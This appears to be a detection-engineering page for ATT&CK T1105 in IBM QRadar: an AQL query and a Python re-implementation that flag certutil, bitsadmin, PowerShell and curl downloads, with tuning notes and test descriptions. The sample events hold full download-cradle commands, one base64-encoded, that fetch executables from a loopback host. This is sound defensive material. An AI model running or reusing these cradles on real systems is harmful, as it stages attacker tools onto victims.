T1105 Ingress Tool Transfer · IBM QRadar

Detect Ingress Tool Transfer in IBM QRadar

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools may be pulled via the C2 channel or through alternate protocols using built-in OS utilities (certutil, bitsadmin, PowerShell Invoke-WebRequest, curl, wget, scp). Threat actors including HAFNIUM, Fox Kitten, and Cobalt Group have leveraged this technique to stage second-stage payloads, implants, and post-exploitation toolkits onto victim systems.

MITRE ATT&CK

Tactic
Command and Control
Technique
T1105 Ingress Tool Transfer
Canonical reference
https://attack.mitre.org/techniques/T1105/

QRadar Detection Query

IBM QRadar (AQL)

```sql
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  sourceip AS HostIP,
  username AS AccountName,
  "Process Name" AS ProcessName,
  "Command" AS CommandLine,
  "Target Filename" AS TargetFile,
  QIDNAME(qid) AS EventName,
  CASE
    WHEN LOWER("Process Name") LIKE '%certutil.exe%'
      AND (LOWER("Command") LIKE '%-urlcache%' OR LOWER("Command") LIKE '%-decode%' OR LOWER("Command") LIKE '%-verifyctl%')
      THEN 'certutil_download'
    WHEN LOWER("Process Name") LIKE '%bitsadmin.exe%'
      AND (LOWER("Command") LIKE '%/transfer%' OR LOWER("Command") LIKE '%/addfile%' OR LOWER("Command") LIKE '%/setnotifycmdline%')
      THEN 'bitsadmin_download'
    WHEN (LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%pwsh.exe%' OR LOWER("Process Name") LIKE '%wscript.exe%' OR LOWER("Process Name") LIKE '%cscript.exe%')
      AND (LOWER("Command") LIKE '%invoke-webrequest%' OR LOWER("Command") LIKE '%net.webclient%' OR LOWER("Command") LIKE '%downloadfile%' OR LOWER("Command") LIKE '%downloaddata%' OR LOWER("Command") LIKE '%start-bitstransfer%' OR LOWER("Command") LIKE '%webclient%' OR LOWER("Command") LIKE '%httpclient%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
      THEN 'ps_download_cradle'
    WHEN (LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
      THEN 'curl_wget_download'
    WHEN (LOWER("Process Name") LIKE '%desktopimgdownldr.exe%' OR LOWER("Process Name") LIKE '%esentutl.exe%' OR LOWER("Process Name") LIKE '%expand.exe%' OR LOWER("Process Name") LIKE '%extrac32.exe%' OR LOWER("Process Name") LIKE '%finger.exe%' OR LOWER("Process Name") LIKE '%ftp.exe%' OR LOWER("Process Name") LIKE '%ieexec.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%' OR LOWER("Process Name") LIKE '%xcopy.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%' OR LOWER("Command") LIKE '%ftp://%')
      THEN 'lolbin_download'
    ELSE 'exec_dropped_temp'
  END AS DetectionType
FROM events
WHERE
  (
    (
      LOWER("Process Name") LIKE '%certutil.exe%'
      AND (LOWER("Command") LIKE '%-urlcache%' OR LOWER("Command") LIKE '%-decode%' OR LOWER("Command") LIKE '%-verifyctl%')
    )
    OR
    (
      LOWER("Process Name") LIKE '%bitsadmin.exe%'
      AND (LOWER("Command") LIKE '%/transfer%' OR LOWER("Command") LIKE '%/addfile%' OR LOWER("Command") LIKE '%/setnotifycmdline%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%pwsh.exe%' OR LOWER("Process Name") LIKE '%wscript.exe%' OR LOWER("Process Name") LIKE '%cscript.exe%')
      AND (LOWER("Command") LIKE '%invoke-webrequest%' OR LOWER("Command") LIKE '%net.webclient%' OR LOWER("Command") LIKE '%downloadfile%' OR LOWER("Command") LIKE '%downloaddata%' OR LOWER("Command") LIKE '%start-bitstransfer%' OR LOWER("Command") LIKE '%webclient%' OR LOWER("Command") LIKE '%httpclient%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%')
    )
    OR
    (
      (LOWER("Process Name") LIKE '%desktopimgdownldr.exe%' OR LOWER("Process Name") LIKE '%esentutl.exe%' OR LOWER("Process Name") LIKE '%expand.exe%' OR LOWER("Process Name") LIKE '%extrac32.exe%' OR LOWER("Process Name") LIKE '%finger.exe%' OR LOWER("Process Name") LIKE '%ftp.exe%' OR LOWER("Process Name") LIKE '%ieexec.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%' OR LOWER("Process Name") LIKE '%xcopy.exe%')
      AND (LOWER("Command") LIKE '%http://%' OR LOWER("Command") LIKE '%https://%' OR LOWER("Command") LIKE '%ftp://%')
    )
    OR
    (
      (LOWER("Target Filename") LIKE '%\\temp\\%' OR LOWER("Target Filename") LIKE '%\\appdata\\%' OR LOWER("Target Filename") LIKE '%\\programdata\\%' OR LOWER("Target Filename") LIKE '%\\users\\public\\%')
      AND (LOWER("Target Filename") LIKE '%.exe' OR LOWER("Target Filename") LIKE '%.dll' OR LOWER("Target Filename") LIKE '%.ps1' OR LOWER("Target Filename") LIKE '%.vbs' OR LOWER("Target Filename") LIKE '%.bat' OR LOWER("Target Filename") LIKE '%.hta')
      AND (LOWER("Process Name") LIKE '%certutil.exe%' OR LOWER("Process Name") LIKE '%bitsadmin.exe%' OR LOWER("Process Name") LIKE '%powershell.exe%' OR LOWER("Process Name") LIKE '%curl.exe%' OR LOWER("Process Name") LIKE '%wget.exe%' OR LOWER("Process Name") LIKE '%mshta.exe%')
    )
  )
ORDER BY starttime DESC
LAST 24 HOURS
```

Severity: High · Confidence: Medium

QRadar AQL detection for T1105 Ingress Tool Transfer. It queries the events table using custom properties typically parsed by the Microsoft Windows Security DSM and the Sysmon DSM, and matches LOLBin download activity, PowerShell download cradles, and executables written to suspicious temporary paths by download utilities. Each branch of the CASE expression labels the WHERE branch it mirrors; the final 'exec_dropped_temp' label covers files with executable extensions written under Temp, AppData, ProgramData or Users\Public by one of the listed download utilities (typically Sysmon Event ID 11). Requires the 'Process Name', 'Command', and 'Target Filename' custom properties to be extracted from Windows Event 4688 and Sysmon Event ID 1/11 log sources. Because every condition is a case-insensitive LIKE substring match, renamed binaries and PowerShell -EncodedCommand payloads are not matched by this query as written.
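As an added example, not part of this page's QRadar content, the following Python re-implements the CASE labels of the query above and runs them over constructed sample events, so the branch logic can be exercised without a QRadar instance. It goes one step beyond the AQL: an optional pre-processing step decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE) before the substring rules run, which is exactly the case the LIKE patterns cannot see. The event layout, file paths, loopback URLs and the benign control event are assumptions made for illustration.

```python
"""Added example (not the page's QRadar content): the AQL CASE labels as Python,
run over constructed sample events, with optional -EncodedCommand decoding."""
import base64
import re
from typing import Optional

URL_SCHEMES = ("http://", "https://")
SUSPICIOUS_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\")
DROP_EXTS = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".hta")
LOLBINS = ("desktopimgdownldr.exe", "esentutl.exe", "expand.exe", "extrac32.exe",
           "finger.exe", "ftp.exe", "ieexec.exe", "mshta.exe", "xcopy.exe")
DROPPERS = ("certutil.exe", "bitsadmin.exe", "powershell.exe", "curl.exe",
            "wget.exe", "mshta.exe")
PS_CRADLE = ("invoke-webrequest", "net.webclient", "downloadfile", "downloaddata",
             "start-bitstransfer", "webclient", "httpclient")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def _has(haystack: str, *needles: str) -> bool:
    """Case-insensitive substring test, the Python equivalent of LOWER(x) LIKE '%n%'."""
    h = haystack.lower()
    return any(n in h for n in needles)


def normalize_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload to cmd so substring rules can
    see the real cradle. Returns cmd unchanged if there is nothing to decode or
    the blob is not valid base64 / UTF-16LE."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return f"{cmd} [decoded: {decoded}]"


def classify(event: dict, decode_encoded: bool = True) -> Optional[str]:
    """Same branch order as the AQL CASE expression; None means no match."""
    proc = event.get("Process Name", "")
    cmd = event.get("Command", "")
    if decode_encoded:
        cmd = normalize_command(cmd)
    tgt = event.get("Target Filename", "").lower()

    if _has(proc, "certutil.exe") and _has(cmd, "-urlcache", "-decode", "-verifyctl"):
        return "certutil_download"
    if _has(proc, "bitsadmin.exe") and _has(cmd, "/transfer", "/addfile", "/setnotifycmdline"):
        return "bitsadmin_download"
    if (_has(proc, "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")
            and _has(cmd, *PS_CRADLE) and _has(cmd, *URL_SCHEMES)):
        return "ps_download_cradle"
    if _has(proc, "curl.exe", "wget.exe") and _has(cmd, *URL_SCHEMES):
        return "curl_wget_download"
    if _has(proc, *LOLBINS) and _has(cmd, *URL_SCHEMES, "ftp://"):
        return "lolbin_download"
    if _has(tgt, *SUSPICIOUS_DIRS) and tgt.endswith(DROP_EXTS) and _has(proc, *DROPPERS):
        return "exec_dropped_temp"
    return None


def run(events, decode_encoded: bool = True):
    """Return [(index, label)] for every event the logic would surface."""
    hits = []
    for i, ev in enumerate(events):
        label = classify(ev, decode_encoded)
        if label:
            hits.append((i, label))
    return hits


# Constructed sample events (not real telemetry). Event 3 carries the same kind
# of WebClient cradle as event 2, but passed through -enc as base64/UTF-16LE.
_CRADLE = "(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/d.exe','C:\\Users\\Public\\d.exe')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Process Name": r"C:\Windows\System32\certutil.exe",
     "Command": r"certutil.exe -urlcache -split -f http://127.0.0.1:8080/a.exe C:\Users\u\AppData\Local\Temp\a.exe"},
    {"Process Name": r"C:\Windows\System32\bitsadmin.exe",
     "Command": r"bitsadmin /transfer job /download /priority high http://127.0.0.1:8080/b.exe C:\Users\Public\b.exe"},
    {"Process Name": PS,
     "Command": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/c.exe','C:\\ProgramData\\c.exe')\""},
    {"Process Name": PS, "Command": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    # Sysmon Event ID 11 style record: curl.exe wrote an .exe under Users\Public
    {"Process Name": r"C:\Windows\System32\curl.exe", "Command": "",
     "Target Filename": r"C:\Users\Public\e.exe"},
    # Benign control: ordinary process with no download indicators
    {"Process Name": r"C:\Windows\System32\notepad.exe",
     "Command": r"notepad.exe C:\Users\u\notes.txt"},
]

if __name__ == "__main__":
    print("as the AQL sees it:", run(SAMPLE_EVENTS, decode_encoded=False))
    print("with -enc decoded: ", run(SAMPLE_EVENTS, decode_encoded=True))
```

Running with decode_encoded=False reproduces what the AQL sees: events 0, 1, 2 and 4 are labelled and event 3, the encoded cradle, is silently missed. With decoding enabled, event 3 is labelled 'ps_download_cradle' as well. In QRadar the practical way to close that gap is at the collection layer rather than in the LIKE patterns, for example by also ingesting PowerShell Event ID 4104 script block logs, which record the decoded script text.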

Data Sources

  • Microsoft Windows Security Event Log DSM (Event 4688 with process command line auditing enabled)
  • Sysmon DSM (EventID 1 Process Create, EventID 11 File Create) via Windows Event Log forwarding
  • Windows endpoint agents forwarding to QRadar via WinCollect or syslog

Required Tables

  • events (QRadar normalized event table)
  • Custom properties 'Process Name', 'Command', 'Target Filename': these must be defined and extracted in the QRadar DSM editor for the Windows and Sysmon log sources

False Positives & Tuning

  • Enterprise endpoint management platforms (Tanium, BigFix, Ansible) that use PowerShell WebClient methods to distribute software packages to managed endpoints
  • Security products performing automated threat intelligence downloads, agent self-updates, or signature refreshes via certutil or BITS — common for CrowdStrike, Carbon Black, and Symantec agents
  • Developer workstations where npm, pip, or other package managers and their post-install scripts invoke PowerShell download cradles or curl/wget against internal package repositories
  • Tune by excluding known software-distribution accounts, management-server destinations, or host groups with AND NOT clauses rather than by removing patterns; note that the substring matching is evaded by -EncodedCommand payloads and renamed binaries, so a quiet query is not proof of absence

Testing Methodology

Validate this detection against the five Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Certutil URL Cache Download

    Expected signal: Sysmon Event ID 1: Process Create with Image=certutil.exe, CommandLine containing '-urlcache -split -f http://'. Sysmon Event ID 3: Network Connection from certutil.exe to 127.0.0.1:8080. Sysmon Event ID 11: File Create at %TEMP%\df00tech-test.exe with Image=certutil.exe. Security Event ID 4688 if command line auditing is enabled. The process event matches the 'certutil_download' branch; the file create matches 'exec_dropped_temp'.

  2. Test 2: BitsAdmin File Transfer

    Expected signal: Sysmon Event ID 1: Process Create with Image=bitsadmin.exe, CommandLine containing '/transfer' and '/download'. Sysmon Event ID 3: Network Connection from bitsadmin.exe to 127.0.0.1:8080. Microsoft-Windows-Bits-Client/Operational Event ID 3 (job created) and Event ID 59 (transfer started; this record carries the remote URL), followed by Event ID 60 with the final transfer status code if the server responds. Sysmon Event ID 11 for file creation if the download succeeds. Matches the 'bitsadmin_download' branch.

  3. Test 3: PowerShell Invoke-WebRequest File Download

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and '-OutFile'. Sysmon Event ID 3: Network Connection from powershell.exe to 127.0.0.1:8080. Sysmon Event ID 11: File Create at %TEMP%\df00tech-iwr.exe. PowerShell ScriptBlock Log Event ID 4104 with the full cmdlet and parameters. Matches the 'ps_download_cradle' branch.

  4. Test 4: Certutil Encode-then-Decode Two-Stage Transfer

    Expected signal: Two Sysmon Event ID 1 entries: first for certutil.exe -encode, second for certutil.exe -decode. Both events will have CommandLine containing 'certutil.exe' and temp path arguments. The -decode invocation is the targeted indicator; the query's certutil branch matches '-decode' but not '-encode', so expect one hit, not two. Security Event ID 4688 for both invocations if command line auditing is enabled.

  5. Test 5: Linux curl Download to /tmp

    Expected signal: auditd syscall records for execve of curl with arguments including '-o /tmp/'. Syslog or auditd file creation record for /tmp/df00tech-test-payload. If an auditd watch rule covers writes to /tmp (for example -w /tmp -p w), a matching watch record fires. If an endpoint agent (Falcon, Defender for Linux) is present, a process creation event with curl and the -o /tmp argument is generated. Note that the AQL above matches only 'curl.exe' and 'wget.exe' and Windows-style paths, so this test validates the Linux telemetry pipeline but will not fire the query as written; a Linux variant needs the auditd DSM fields and unsuffixed 'curl'/'wget' patterns.
